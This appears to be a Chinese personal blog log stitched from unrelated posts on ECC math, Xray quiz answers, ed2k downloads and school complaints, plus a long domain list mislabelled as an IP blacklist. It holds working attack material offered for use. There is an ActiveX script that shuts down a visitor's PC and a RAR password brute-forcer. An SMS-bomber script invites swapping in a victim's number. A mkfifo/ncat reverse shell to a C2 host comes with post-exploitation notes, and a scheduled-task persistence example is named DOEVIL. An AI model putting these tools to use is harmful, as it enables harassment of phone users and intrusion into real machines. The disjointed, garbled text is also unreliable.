$char="{$_SERVER['REMOTE_ADDR']}" . "\t" . date('Y-m-d H:i:s') . "\t" . "{$_SERVER['HTTP_USER_AGENT']}" . "\n";
fwrite(fopen('0.txt','a'),$char);
?>
```
第三步 touch /var/www/html/0.txt && chown www-data:www-data /var/www/html/0.txt
第四步 访问你的网站后 cat /var/www/html/0.txt
查看是否有IP地址 访问日期 和UA标识
如果你做完了前三步 在第四步出现了问题 🤣
那么就tail -f /var/log/apache2/error.log
复制它们并回复给我
如果你没有用apache2服务器而是nginx服务器 那么就参考第二步
提交于2025年8月13日
之前网页是这样挂马的
在一段html插入如下脚本
<script type='text/javascript'>
function LYC()
{
var cmd=new ActiveXObject("WScript.Shell");
var cmdStr="cmd /c shutdown /s";
var res=cmd.run(cmdStr,0,true);
}
添加一个"点击我"的按钮
<button type="button" onclick="LYC()">点击我</button>
更改一下ie浏览器的安全设置
先热键alt+x
单击internet options
单击选项卡security
单击custom level
Intitlize and script ActiveX controls not marked as safe for scripting
勾选Enable
单击两次OK
本帖与信息技术无关.
无产阶级的伟大导师是马克思毛泽东列宁
那么我的导师又有谁呢?
第一个伟大导师:偶尔有点小迷糊
他的作品让我记忆犹新
import os
import datetime
from unrar import rarfile
import sys
def crack(encryptfile):
bFound=False
fp=rarfile.RarFile(winfile)
start=0
stop=9999
for i in range(start,stop):
pwd=str(i).zfill(4)
try:
fp.extractall(path=".",pwd=pwd)
print('\npassword'+pwd)
bFound=True
fp.close
except Exception as e:
print("\rcomplete","{:.0%}".format((i-start)/(stop-start)),end="")
if bFound:
break
if __name__=='__main__':
starttime=datetime.datetime.now()
crack(sys.argv[1])
第二个伟大导师
尼卡球球(a.k.a Hui3c)他的同伴是Xiaopan233
虽然CSDN病危了 但BUG多了难免会出现不少代码
所以site:blog.csdn.net还是加上为妙
前几个帖子的伟大导师已经有一个踩缝纫机去了.这里不再赘述.
最后一个被人误解为跳梁小丑的群体
红客
Coolfire(如果你听到没有如雷贯耳 我建议去web.archive.org逛逛 429的话去买家宽)曾说过
"""
多年来 网路(tw话)上出现许多山寨版的红客联盟 造成娱乐化的现象让人惋惜
"""
我就在霹雳霹雳发布了一个视频
import requests
from stem import Signal
from stem.control import Controller
url="https://check.torproject.org"
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from bs4 import BeautifulSoup
proxies = {'https':'socks5h://127.0.0.1:9150'}
while True:
try:
c=Controller.from_port()
c.authenticate()
c.signal(Signal.NEWNYM)
r = requests.get(url=url, proxies=proxies,verify=False).text
print(BeautifulSoup(r,'lxml').strong.string)
except KeyboardInterrupt:
print('Control-C')
break
被锁定了(就这么个垃圾程序)
告别霹雳霹雳 从此Youtube
gfw-looking-glass.sh: while true; do printf "\0\0\1\0\0\1\0\0\0\0\0\0\6wux.ru\300" | nc -uq1 $SOME_IP 53 | hd -s20; done
https://x.com/gfwrev/status/25220534979
Therefore,I will introduce github.com/bytecategory/DelGuard!!!
It also includes RegGuard.(This reminds me of so-called IT guru a.k.a dumbass J)
在2025年September 27 这一天也是谷歌的生日
delguard几个问题的存档:
1) delguard install或者delguard install --system后del.bat和rmdir.bat没有添加到环境变量
这说明AI的(go语言)才是真正的屎山代码.
2) README.md也有问题 它说是go build -o delguard .
应该改成go build -o delguard.exe .
3) if pv.isProtectedPath(cleanpath)
在80-83行到83行
这导致属于Administrators组的用户del.bat (路径)时不会有变化.
......未完待续
A blacklist of IP addresses is needed on the Internet and they are compromised IP addresses.
In order to collect them please do it step by step.
Step 1 Write addtype application/x-httpd-php .htm html in /etc/apache2/apache2.conf
Step 2 Write in the body tag of /var/www/html/index.html
<?php
$char="{$_SERVER['REMOTE_ADDR']}" . "\t" . date('Y-m-d H:i:s') . "\t" . "{$_SERVER['HTTP_USER_AGENT']}" . "\n";
fwrite(fopen('0.txt','a'),$char);
?>
Step 3 touch /var/www/html/0.txt && chown www-data:www-data /var/www/html/0.txt
Step 4 After visiting your website cat /var/www/html/0.txt
See if there is an IP address access date and UA identity
If you have done the first three steps and there is a problem in the fourth step.
So tail -f /var/log/apache2/error.log
Copy them and reply to me.
If you are not using an apache2 server but an nginx server,then refer to Step 2.
Submitted on August 13,2025
gh repo clone https://github.com/bytecategory/legacytech.git
cd legacytech
rm -rf .git
git init
git remote add origin https://github.com/bytecategory/legacytech.git
以前我用的是:
git add -A
git commit -m "~"
git branch -M main
git push -f origin main
现在我用的是:
git lfs track 1.ISO
git lfs track 2.ISO
git lfs track 3.ISO
git lfs track 4.ISO
git add .gitattributes
git add -A
git commit -m "~"
Github仓库Cierra-Runis/Elliptic-Curves-Number-Theory-and-Cryptography
workflow有PDF可以下载.简体中文
以上是口算ECDHKE的渊源了,这个作者的followers也就比我多亿点点.
from sympy import mod_inverse
(模逆运算很简单)
p = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
a = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC
b = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
x = 0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
y = 0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5
n = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
U221E = (0,0)
其实U+221E是无穷原点的Unicode
def point_add(P1 , P2):
if P1 == U221E:
return P2
if P2 == U221E:
return P1
x1 , y1 = P1
x2 , y2 = P2
if x1 != x2:
m = (y2 - y1) * mod_inverse(x2 - x1,p) % p
x3 = (m ** 2 - x1 - x2) % p
y3 = (m * (x1 - x3) - y1) % p
return (x3,y3)
if x1 == x2 and y1 != y2:
return U221E
这是点的加法
def point_double(P1, P2):
x1 , y1 = P1
x2 , y2 = P2
if P1 == P2 and y1 != 0:
m = (3 * x1 ** 2 + a) * mod_inverse(2 * y1,p) % p
x3 = (m ** 2 - 2 * x1) % p
y3 = (m * (x1 - x3) - y1) % p
return (x3,y3)
if P1 == P2 and y1 == 0:
return U221E
略过了
def double_and_add(s,P):
bits = format(s,'b')[::-1]
res = U221E
temp = P
for bit in bits:
if bit == '1':
res = point_add(res , temp)
temp = point_double(temp , temp)
return res
本来维基百科的编辑者们可以用位运算的 ::-1这个slice还是我添加的.
我还参考了https://secg.org等,他们都作出了贡献.
这里有不少彩蛋,我不会指出的,我还在抱怨我的followers什么时候才能超过一个呢.
短信轰炸机(看看后果吧 金数据)
import requests
url='https://jinshuju.com/graphql/f/GWSnA4'
json = [
{
'operationName': 'CreateFieldVerification',
'variables': {
'input': {
'fieldApiCode': 'field_1',
'formId': 'GWSnA4',
'mobile': '15829381956',
},
},
'extensions': {
'persistedQuery': {
'sha256Hash': '77e2c905d36069c91d2ea55e915a1916204393b04a632087d59001301e6f7f5b'
},
},
}
]
# mobile可以在t.me/qingbaoju_qun里找
# 自行换成你要轰炸的电话号码
# [.] 换成 .
requests.post(url=url, json=json)
i.scwy.net这个域名的法人(不知道这么称呼好不好)
在CSDN博客上问ed2k如何下载
我这里给出解答
你需要开两个终端--- ---
apt install amule-daemon
adduser amuleusername
passwd -d amuleusername
su - amuleusername 建议这样做
amuled -f
vim ~/.aMule/amule.conf
echo -n "1234" | md5sum
# 在~/.aMule/amule.conf中设置ECPassword和 AcceptExternalConnections字段
ECPassword 81dc9bdb52d04dc20036dbd8313ed055
AcceptExternalConnections 1
cd ~/.aMule
把http://upd.emule-security.org/nodes.dat下载到这个目录
amulecmd
输入aMule连接的密码后(我这里是1234)
可以看到aMulecmd$这个提示符了
Connect
会说已经连接到ed2k和kad网络了
Add ed2k://|file|zh-cn_windows_11_business_editions_version_25h2_updated_dec_2025_x64_dvd_5aa0bca1.iso|8245350400|5CF818AB160C3822790E4CFD01708855|/
这是next.itellyou.cn上的Windows 11操作系统
ed2k链接外不要使用引号
stats 其实最好用Status或show dl,stats是一个已弃用的命令
可以看到上传和下载
不过比乌龟还要慢,迅雷(Thunder)难道不好吗?14人民币/2月(超级会员),还有海量业务逻辑漏洞.
最后建议这位致力于利用IT和自动化技术提升企业效能和客户体验的老哥能告别CSDN,从此StackOverflow
2026/1/2,Fangliding把我ban了(从Telegram group里)
原因是我在https://t.me/projectXray 里被 t.me/iWuMingBot 共警告了三次(这是第三次)(而这三次至少有两次是他策划的,第二次是R主席@他,让他警告两个对骂的暴躁哥,然后他假公济私,将我警告了一次)
我当时只发了两个网址和说明(其他只字未提)
https://caonima.de/api.php?level=min (唤作口吐莲花)
https://caonima.de/api.php?level=max (唤作火力全开)
第三次是我描述我开发的 t.me/evilpickbot 当chat_join_request时或用户输入/start时的行为
吃瓜群众可以加入https://t.me/FREEDOM_INDEX 来使用它
然后他说:"你叽里咕噜在说什么?"
于是我回答了他的问题.
并问他群头衔"Touka"是什么
随后被ban.你没有看错,就这样被ban了.
此外,据不完全统计,Fangliding删除我的消息超过8个.现在一个也没了.
请吃瓜群众移步github.com/bytecategory/cybermath,我要开始公布7个入群验证的答案解析了.
伟大导师program-think曾在Netcat-Tricks中提到
"""
据说是考虑到-e选项太过危险,nc的OpenBSD变种在多年前已经移除了该选项,但其实捏
还是可以用间接的方式达到同样的效果,至于如何做,俺就不透露啦.
"""
我可就要好好透露啦!
第一步mkfifo /tmp/p
建立一个命名管道
cat /tmp/p | /bin/sh/ -i 2>&1 | ncat 8.8.8.8 53 > /tmp/p
(假如你的C2是8.8.8.8,那么就ssh登录它并且nc -lvp 53)
第一个匿名管道记作匿名管道一号,第二个匿名管道记作匿名管道二号
进程A(cat /tmp/p)
stdin 无
stdout 匿名管道一号的写端
stderr 无
进程B(/bin/sh/ -i 2>&1)
stdin 匿名管道一号的读端
stdout 匿名管道二号的写端
stderr 重定向到stdout的"地址"(这里的&并非C语言的&)
进程C(ncat 8.8.8.8 53 > /tmp/p)
stdin 匿名管道二号的读端(/bin/sh的stdout和stderr)
stdout 重定向到命名管道/tmp/p
stderr 无
假如在8.8.8.8上标准输入"ls\n"
/bin/sh会用fork创建子进程,然后子进程用__GI_execve执行/usr/bin/ls,也即__GI_execve("/usr/bin/ls",['ls'],?)
其中这个问号是一个数组,可以用printenv或env查看
验证方法
gdb /bin/sh
如果像我一样没有调试符号,那么就用寄存器而非argc,argv一类.
(gdb) break execve
(gdb) set-follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) run -i
# ls
info registers
记下rdi的地址(无论0x0(十六进制)列下还是0(十进制)列下)
x/s 0x555555574688
输出 /usr/bin/ls
记下rsi的地址0x555555574510
x/s ((char**)0x555555574510)[0]
这个索引是0的即['ls']
从2开始即是那个问号了.
同样,ncat也是用__GI___libc_read来工作的.
背景
xxxx给了我100多个树莓派
全国各地都有,有45台在线,命令行不允许交互(还好有命名管道),给了我网站控制台,armv7l
在November 10,它没了,可能是Sec-WebSocket-Key重复使用触发风控而非xxxx所说的"资源占用太多影响正常使用,然后查日志发现了"
回忆录
有几个x86的树莓派是(venv)提示符,echo $0也是/bin/sh
我参考了ptyshell仓库中的pty.c
和Call xdg-open in C 这两个文件
设计了无脑秒连的应用程序.
当时我还把GM620开Telnet了.
这个网站控制台是乙方的,一个树莓派一个公司(甲方).
后渗透
print(__import__('bs4').BeautifulSoup(__import__('requests').get('http://192.168.3.1').text,'html.parser').title.string)
xxxx是emptiness-a-new-evolving-botnet中的主角,也是我的朋友.
@360Netlab
来晚了 这件事发生的时间你猜猜看
谬论1
"""
打开Chrome,因为它是暗网吗,它就是使用特定的工具才能访问的.
"""
事实上,Chrome也可以访问onion v3地址.
雷人operation 2
这个讲师在360安全浏览器中访问https://www.baidu.com 并依次搜索
1 洋葱路由器
2 or Browser
3 Tor Browser
最后访问了https://tor-browser.en.softonic.com
然而Tor的官方网址是https://www.torproject.org
他还用迅雷的新建下载任务下载torbrowser-install-win64-8.5.3_en-US.exe
.更无语的是
UP主的标题是"破解Windows密码!C/C++专业破解技术,忘记Windows密码?分分钟给你破解出来."
然而,讲师仅打印了lsass.exe进程的句柄...
缪论3
"""
下载暗网
"""
纠正:暗网不是一个APP
缪论4
"""
洋葱路由加七级跳转
"""
纠正:用脚趾想即可.
谬论5
"""
到了第三层,安全专家八年无法攻破.
"""
纠正同上.
"""
马里亚纳网络
"""
解决方案:建议作为一篇RFC在2026年4月1日发布.
来源
https://youtube.com/shorts/SBmaR1a3LDA
https://b23.tv/qkWJ9So
https://youtube.com/shorts/UM_Wv77TkWU
由于血压上升,今天分享到此为止.
1 将Let's encrypt的YE1证书的p-384公钥和使用"114514"在http://xcalc.pages.dev 计算结果的作为hex解码后的前48字节作为私钥,进行椭圆曲线迪菲-赫尔曼交换,获得的共享秘密前3个字节是.
2 将世界上最后一张ip6.arpa证书的p-256公钥和使用"114514" sha512结果的前32字节作为私钥,进行椭圆曲线迪菲-赫尔曼密钥交换,获得的共享秘密前3个字节是.(错题)
关于第二题,我给Yuhan6665发送了一个消息,但是问了Spam Info bot,它说
"I am afraid some Telegram users found your message annoying and forwarded them to our team."
后来作罢.(这个故事可以滑到下面去看.)
消息如下
"""
CA/Browser Forum在2025年11月10日投票的Ballot SC-086v3
该提案不允许了给ip6.arpa及其子域名颁发公共信任的TLS证书
所以世界上最后一张ip6.arpa子域名的PEM cert的p-256公钥(在https://crt.sh 中ID是21503216809)是一个
未压缩的椭圆曲线公钥.(如果后文提到,则是ECC公钥)
它的后三个字节是9a6a4d.
如果大佬(Yuhan6665)认可"以上叙述",那么一道入群题需要更改.
"""
3 在Xray中,使用vision且设置TLS指纹为HellowChrome_120_PQ时,对其JA4指纹sha384后,后六位是.(错题)
4 在Xray中,使用WSS且设置TLS指纹为safari时,对其JA4指纹md5后,后六位是.
5 在Xray中,设置TLS指纹为safari时,对其JA4指纹sha384后,后六位是.
6 Curve25519中,有限域中的非0元素个数的48次方根是多少.
7 xray24.10.32以hex打开后第114514字节往后3字节.
限于时间,今天就分享两道题目的解法,标注错题的为什么是错题明天再说.
柿子挑软的捏,先看最后一题.
7 访问https://github.com/XTLS/Xray-core ,单击Release,
接下来访问https://github.com/XTLS/Xray-core/releases/tag/v24.10.31
下载Xray-linux-64.zip并解压缩它.
xxd -l -s 114513 -l 3 xray
结果是e88a14
a=open('/root/Downloads/xray','rb')
a.seek(114513)
114513
a.read(3).hex()
结果也是e88a14
a.close()
最后别忘了关闭.
1
访问https://letsencrypt.org/certificates/ 并单击Certificate details后的pem,另存为int-ye1.pem.
用openssl查看证书(假设它是公钥证书)
openssl x509 -in ./int-ye1.pem -text -noout
这和https://letsencrypt.org/certs/gen-y/int-ye3.txt 里的文本是一样的.
可以知道它的签名算法是ECDSA(椭圆曲线数字签名算法),它于1999年被接受为ANSI X9.62,ANSI X9.62定义了prime256v1,而SEC2 v2定义了secp256r1,换句话说,在ANSI X9.62中曲线secp256r1被命名为了prime256v1.
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import serialization
from cryptography import x509
y = open("./int-ye1.pem",'rb')
l = y.read()
y.close()
c = x509.load_pem_x509_certificate(l)
p = c.public_key()
u = p.public_bytes(encoding=serialization.Encoding.X962,format=serialization.PublicFormat.UncompressedPoint)
将u.hex与pub:后字符串(同样来自于int-ye3.txt)去掉冒号比较,发现是一样的,注意这个序列是以04开头的.
众所周知,其实使用"114514"在xcalc.pages.dev计算结果就是加盐Sha512,盐值是"salt114514".
结果是a84a0c3e9c4e97258534dfb703b067e4b457bb7050ca1fe7ee031e8d4a229fdcf74850ffeaf7dfcd9672be1430047bbdbc0dda246f9b8baae7a5031456e84763
有128个(偶数个)十六进制数字
用binascii模块的unhexlify将它作为hex解码.
然后取开头到48号位(不含)的字符,这个数组所表示的整数(int.from_bytes,第二个参数是'big',字节顺序是大端序)就是a84a0c开头的哈希前面加个0x的结果,这个结果记作L
Q = ec.derive_private_key(L, ec.SECP384R1())
Q.exchange(ec.ECDH(), p)
这就是答案了,3ccf00bc927f12cc9e0a98ff21add7fc9b2f44637d8799729fdabb0e593d6742b75cf4bd88d919fbd0d9d2ba4b2099a3
前三个字节是3ccf00,撒花完结.
预告片(和本题无关)
我当时在projectXray中说:"小子不才,只会口算ECDH.",这个灵感来自于当年哔哩哔哩UP主"赛博保安寒某某"的一个视频下的评论:"小子不才,只会口算MD5."
它们两个的共同之处是只是加减乘除模运算与或非,口算起来咻咻的.
那么如何口算椭圆曲线迪菲赫尔曼交换呢?首先需要约定域参数
secp256r1的ECC方程是y^2=x^3-3x+b mod p
a=-3和a=FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC是一样的,因为他们模p都一样.
其中p等于2^244\cdot (2^32-1)+2^192+2^96-1是一个素数,b是随机选择的整数(当然是NIST自己"随机选择"的),b其实等于5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
获得更多信息就请阅读sec2-v2.pdf
github.com/pyca/cryptography/blob/main/src/cryptography/hazmat/primitives/asymmetric/ec.py#L302-L307
其中Order n of G即是变量group_order
...
附录:
已知OID是c.signature_algorithm_id,在这个证书里是1.2.840.10045.4.3.2
rfc5758.txt也提到过它的OID
ecdsa-with-SHA256 OBJECT IDENTIFIER ::= { iso(1) member-body(2) us(840) ansi-X9-62(10045) signatures(4) ecdsa-with-SHA2(3) 2 }
注意,上面的OID是ecdsa-with-sha256的OID,是ECC数字签名算法的OID,而
rfc5480.txt提到的OID
secp256r1 OBJECT IDENTIFIER ::= { iso(1) member-body(2) us(840) ansi-X9-62(10045) curves(3) prime(1) 7 }
是ECC域参数的OID,不要混淆了.
...
未完待续.
千山万水总是情,点个star行不行~~~
https://raw.githubusercontent.com/bytecategory/cybermath/refs/heads/main/README.txt
很好,在一个名为ScheduledTasks的模块中发现了很多命令
Get-Command -Module ScheduledTasks
CommandType Name Version Source
----------- ---- ------- ------
Function Disable-ScheduledTask 1.0.0.0 ScheduledTasks
Function Enable-ScheduledTask 1.0.0.0 ScheduledTasks
Function Export-ScheduledTask 1.0.0.0 ScheduledTasks
Function Get-ClusteredScheduledTask 1.0.0.0 ScheduledTasks
Function Get-ScheduledTask 1.0.0.0 ScheduledTasks
Function Get-ScheduledTaskInfo 1.0.0.0 ScheduledTasks
Function New-ScheduledTask 1.0.0.0 ScheduledTasks
Function New-ScheduledTaskAction 1.0.0.0 ScheduledTasks
Function New-ScheduledTaskPrincipal 1.0.0.0 ScheduledTasks
Function New-ScheduledTaskSettingsSet 1.0.0.0 ScheduledTasks
Function New-ScheduledTaskTrigger 1.0.0.0 ScheduledTasks
Function Register-ClusteredScheduledTask 1.0.0.0 ScheduledTasks
Function Register-ScheduledTask 1.0.0.0 ScheduledTasks
Function Set-ClusteredScheduledTask 1.0.0.0 ScheduledTasks
Function Set-ScheduledTask 1.0.0.0 ScheduledTasks
Function Start-ScheduledTask 1.0.0.0 ScheduledTasks
Function Stop-ScheduledTask 1.0.0.0 ScheduledTasks
Function Unregister-ClusteredScheduledTask 1.0.0.0 ScheduledTasks
Function Unregister-ScheduledTask 1.0.0.0 ScheduledTasks
当然,还有函数,但本质上是一回事
Register-ScheduledTask -TaskName "DOEVIL" -Description "DOEVIL" -Action (New-ScheduledTaskAction -Execute "notepad.exe") -Trigger (New-ScheduledTaskTrigger -daily -at '18:08 pm') -TaskPath "\Microsoft\Windows\Windows Error Reporting"
$t=Get-ScheduledTask -TaskName "DOEVIL"
$t.Settings.ExecutionTimeLimit="PT720H"
#(如果任务运行时间超过以下时间(720小时),停止任务)
$t.Settings.StartWhenAvailable=$true
#(如果过了计划开始时间,立即启动任务)
Set-ScheduledTask -TaskName "DOEVIL" -Settings $t.Settings
看上去该命令完成了某些操作,回到GUI(taskschd.msc),此时刚创建的任务存在了,太棒了!
以下是Gemini提示词(不是故事!不是故事!不是故事!)
是英语老师们对于常识的无知,更是对于知识的不敬畏,出了一道题
原题大意如下,以上这篇短文可能出现在什么地方?老师给的正确答案是"研究期刊"
我很想请老师们去看一下公开的数学(或者其他学科的)论文有多难,像天书一样,再和上面的短文(由于过于雷人,可能会伤害你,甚至被认为是投毒以至于封号)做一下对比,看看这道题是不是很逆天,但是我做不到,因为之前还有一道题,老师认为"微软"不是一家公司,而是一个人的优点
现在我仍然无法停下我的诉说,对于一个证明单调性的题目,竟然不能用导数,我用了之后老师竟然看不出来,质问这是什么?我想告诉他,但是我不能.
一个约束条件求极值的题目,竟然不能用拉格朗日乘数法,我用了之后老师竟然看不懂.
一个用组合数解决的求集合的势的题目,竟然要用列举法.
一个用了左或右极限才能解决的分段函数单调性的题目,竟然被直接代入,更可笑的是,老师还把一道明明可以直接代入的题目中直接代入的方法叫黑人做法.(黑人怎么你了!?)
我已经发现了几千个,可惜空白太小了,写不下了.
地理老师更牛逼,说风吹人,人感到冷是因为有汗,那么为啥我用风吹手机,手机就冷了?也许国产手机坏的流脓,以至于冷了.
地理老师把日本称为小日本,我很疑惑甚至愤怒,日本招你惹你了?相反的,有些中国人比日本人可恨多了,甚至有一个人在屁哩屁哩上说:"日本是一个懂小礼不讲大义的国家." 真厉害啊!不懂小礼何以讲大义?一屋不扫何以扫天下?
地理老师雷人言论
1 "虾是脊椎动物"
2 "我物理学的很好,很有天赋"
3 "量子力学只有智商很高的人才能学会"
4 "没看到河流就没有河流地貌"
The IP address blacklist has been completed.
.10jqka.com.cn
.12333.gov.cn
.123cha.com
.12530.com
.126.com
.13139.com
.15150.com
.163.com
.163888.net
.17173.com
.17game.com
.17k.com
.17kk.net
.17u.net
.19floor.net
.1t1t.com
.1ting.com
.1ting.net
.2000y.net
.2100book.com
.21cn.com
.21dnn.com
.21food.cn
.2552.com.cn
.263.com
.263.net
.265.com
.28.com
.3322.org
.3533.com
.3653h.com
.365zhaosheng.com
.371.net
.3721.com
.3839.com
.39.net
.3lian.com
.4399.com
.456.net
.500wan.com
.50bang.com
.51.net
.5173.com
.51766.com
.51fashion.com.cn
.51haha.com
.51hejia.com
.51job.com
.51mike.com
.51uc.com
.520music.com
.52pk.net
.5460.net
.5566.net
.55bbs.com
.5617.com
.58.com
.5fad.com
.6621.com
.6to23.com
.766.com
.788111.com
.79wx.com
.7k7k.com
.7m.cn
.7t7t.com
.800hr.com
.86516.com
.8848.net
.89178.com
.8ttt.com
.91.com
.9158.com
.92wy.com
.94pop.com
.95599.cn
.96333.com
.99770.com
.99you.com
.9down.com
.9e3.com
.9flash.com
.9ku.com
.9sky.com
.9you.com
.abcnews.com
.acmilan.com
.adobe.com
.aeeboo.com
.alexa.com
.ali213.net
.alibaba.com.cn
.alipay.com
.allyes.com
.amazon.com
.anyp.cn
.aol.com
.apple.com
.artron.net
.asiafriendfinder.com
.asiagameclub.com
.askyaya.com
.autohome.com.cn
.avl.com.cn
.baihe.com
.bankcomm.com
.bank-of-china.com
.banma.com
.bbn.com.cn
.bbvod.net
.beareyes.com.cn
.beelink.com.cn
.bet007.com
.bitauto.com
.bitcomet.com
.bjpta.gov.cn
.bjradio.com.cn
.blogbus.com
.blogcn.com
.blueidea.com
.bnb88.com
.boc.cn
.bokee.com
.booksky.biz
.btbbt.com
.btchina.net
.btpig.com
.cat898.com
.ccb.com
.ccidnet.com
.ccmove.com
.cctv.com
.ccw.com.cn
.ce.cn
.cfi.net.cn
.cga.com.cn
.chat001.com
.che168.com
.chemnet.com.cn
.chengcai.net
.cheshi.com.cn
.china.com
.china.com.cn
.china110.com
.china315.com
.china89.com
.china91.com
.chinaacc.com
.chinabroadcast.cn
.chinabyte.com
.chinacars.com
.chinagames.net
.chinagba.com
.chinahost.com
.chinahr.com
.chinakids.net.cn
.chinamobile.com
.chinanews.com.cn
.chinapet.com
.chinaren.com
.china-training.com
.chinaunicom.com
.chinaunix.net
.chinaz.com
.chinese.com
.chsi.com.cn
.ci123.com
.cib.com.cn
.citw2008.com
.cjn.cn
.cjol.com
.cmbc.com.cn
.cmbchina.com
.cmfu.com
.cnbeta.com
.cnblogs.com
.cnet.com
.cnhan.com
.cnhubei.com
.cninfo.net
.cnki.net
.cnn.com
.cnnb.com.cn
.cnnic.net.cn
.cnool.net
.cnstock.com
.cnxp.com
.cnxz.com.cn
.cnzz.com
.cococ.com
.cpcw.com
.cpiano.com
.cqnews.net
.crsky.com
.cs.com.cn
.csai.cn
.csdn.net
.ctrip.com
.cuiweiju.com
.dahangzhou.com
.dangdang.com
.dayoo.com
.debian.org
.dell.com
.dgchr.com
.dianping.com
.didai.com
.didibaba.com
.discovery.com
.dns.com.cn
.donews.com
.douban.com
.doubleclick.net
.download.com
.download.net
.driverchina.com
.duote.com
.duowan.com
.duyidu.com
.dvbbs.net
.e800.com.cn
.eastday.com
.eastmoney.com
.ebay.com.cn
.ec.com.cn
.edu158.com
.egoov.com
.elong.com
.emu-zone.org
.ename.cn
.enet.com.cn
.enorth.com.cn
.eol.cn
.espnstar.com.cn
.ete.cn
.examda.com
.f130.com
.fadmy.com
.fantong.com
.fengniao.com
.fff555.com
.fh21.com.cn
.filterdam.com
.fkee.com
.flash512.com
.flash8.net
.flashempire.com
.fm365.com
.fmx.cn
.focus.cn
.foodqs.com
.footballasia.com
.ftchinese.com
.fx120.com
.fzdm.com
.gameyes.com
.ganji.com
.ggyy8.com
.gjj.cc
.go.com
.goal.com
.goodjobs.cn
.gooooal.com
.gutx.com
.gxnews.com.cn
.gznet.com
.hainan.net
.hangzhou.com.cn
.haoting.com
.hc360.com
.herosoft.com
.hexun.com
.hnnn.net
.hnol.net
.hongxiu.com
.hoopchina.com
.hotmail.passport.com
.httpcn.com
.huash.com
.hunantv.com
.hz66.com
.hzcnc.com
.hzrc.com
.iask.com
.ibm.com
.icbc.com.cn
.icq.com
.icxo.com
.idler-et.com
.iecool.com
.ifensi.com
.igo5.com
.iieye.com
.imobile.com.cn
.inhe.net
.intozgc.com
.ip138.com
.it.com.cn
.it168.com
.it918.com
.itpub.net
.itsun.com
.iyaya.com
.izy.cn
.jctrans.com
.jdlaser.com
.jinti.com
.jjwxc.com
.job128.com
.job168.com
.job1998.com
.joyes.com
.joyo.com
.jrj.com
.jrj.com.cn
.jschina.com.cn
.jumpc.com
.jxnews.com.cn
.jz123.cn
.k369.com
.kaicn.com
.keyrun.com
.kijiji.com.cn
.killporn
.kingsoft.com
.kubao.com
.kukudm.com
.lenovo.com.cn
.lottery.gov.cn
.love21cn.com
.loveinhere.com
.lunqun.com
.m18.com
.macd.cn
.made-in-china.com
.mail.com
.mainone.com
.marry5.com
.mdbchina.com
.megajoy.com
.miibeian.gov.cn
.miqiu.com
.mirc.
.mofcom.gov.cn
.mp3.com
.mpinfo.net
.msn.com.cn
.mtime.com
.mtvtop.net
.muchina.com
.mumayi.net
.muwen.com
.mydrivers.com
.myjob.com.cn
.myrice.com
.nen.com.cn
.netbig.com
.netscape.com
.netsh.net
.newhua.com
.newssc.org
.ngacn.com
.niwota.com
.nokia.com.cn
.northeast.cn
.now.cn
.nullsoft.com
.oeeee.com
.okey68.com
.online.sh.cn
.onlinedown.net
.oray.net
.ourgame.com
.p5w.net
.paipai.com
.passport.net
.paycenter.com.cn
.pcauto.com.cn
.pceggs.com
.pcgames.com.cn
.pchome.net
.pclady.com.cn
.pconline.com.cn
.pcpop.com
.pdafans.com
.pengpeng.com
.people.com.cn
.pep.com.cn
.phoenixtv.com
.pku.edu.cn
.popsoft.com
.poptv.com.cn
.powerapple.com
.pplive.com
.ppstream.com
.qianlong.com
.qingdaonews.com
.qingke800.com
.qmzw.com
.qq.com
.qq163.com
.qq163.net
.qqjia.com
.qukanshu.com
.qyule.com
.rayli.com.cn
.real.com
.rednet.com.cn
.rising.com.cn
.runsky.com
.sa20.com
.samebirth.com
.scol.com.cn
.sdo.com
.sg.com.cn
.sgchinese.com
.shangdu.com
.shangdu.com
.shippingchina.com
.shooter.com.cn
.shxun.com
.sina.com
.sina.com.cn
.skycn.com
.sky-fire.com
.skyhits.com
.skyhu.com
.sogua.com
.sohu.com
.soufun.com
.southcn.com
.spbo.com
.sports.cn
.sse.com.cn
.st020.com
.stockstar.com
.stsky.com
.studa.net
.symantec.com
.syzw.cn
.szhome.com
.sznews.com
.szonline.net
.taobao.com
.tbba.com.cn
.techweb.com.cn
.tenpay.com
.tgbus.com
.the9.com
.thethirdmedia.com
.tiancity.com
.tiexue.net
.time.com
.tjkx.com
.tkgame.com
.tom.com
.tomatolei.com
.tq121.com.cn
.ttlttt.com
.tucows.com
.tyfo.com
.ubox.com.cn
.unionsky.cn
.up2c.com
.uusee.com
.uuu9.com
.verycd.com
.vnet.cn
.wallcoo.com
.wangyou.com
.wansong.net
.winamp.com
.wjw.cn
.wo99.com
.wowchina.com
.wuhan.net.cn
.www.net.cn
.wz.zj.cn
.xajh.com
.xcar.com.cn
.xhsd.net
.xiaoyouxi.com
.xici.net
.xicn.net
.xingkong.com
.xinhua.org
.xinhuanet.com
.xinnet.com
.xitek.com
.xmfish.com
.xplus.com.cn
.xuanxuan.com
.xunlei.com
.xxsy.net
.xyxy.net
.yajor.com
.yculblog.com
.ydy.com
.yesite.com
.yesky.com
.ynet.com
.younet.com
.yunxiaoge.com
.yupoo.com
.yx007.com
.yymp3.com
.zaobao.com
.zcom.com
.zdnet.com
.zhantai.com
.zhaopin.com
.zhcw.com
.zhicheng.cc
.zhicheng.com
.zhiji.com
.zhulang.com
.zj.com
.zjol.com.cn
.zol.com.cn
.zzjinhui.
211.161.1.
chinaet.
.55bbs.com
.hncit.
.netease.
.newsmth.
.sinaimg.cn
.edu.cn
.gov.cn
.lssw365.
.ynet.com
.titan24.com
.lssw365.
.dili360.com
.ifeng.com
.openv.com
.zhhunt.com
.hao123.com
.beelink.com
.goumin.com
.dy7cd.com
.sz.net
.qihoo.
.cnto.com
.ccd.com
